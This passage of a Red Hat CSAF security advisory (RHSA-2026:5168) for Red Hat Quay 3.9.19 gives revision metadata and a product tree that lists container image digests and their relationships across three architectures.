"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5168.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.9.19",
"tracking": {
"current_release_date": "2026-04-16T11:08:57+00:00",
"generator": {
"date": "2026-04-16T11:08:57+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5168",
"initial_release_date": "2026-03-19T19:18:06+00:00",
"revision_history": [
{
"date": "2026-03-19T19:18:06+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-19T19:18:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:08:57+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.9",
"product": {
"name": "Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.9::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931764"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Ad97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931180"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931771"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772739181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3Acb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772728539"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3A7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773939659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Af5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Add567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773936323"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931180"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Ace8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772728539"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Ae16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773936323"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931180"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Aca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772728539"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Aa6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773931187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Ad64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773936323"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64 as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le as a component of Red Hat Quay 3.9",
"product_id": "Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.9"
},
{
"category": "default_component_of",
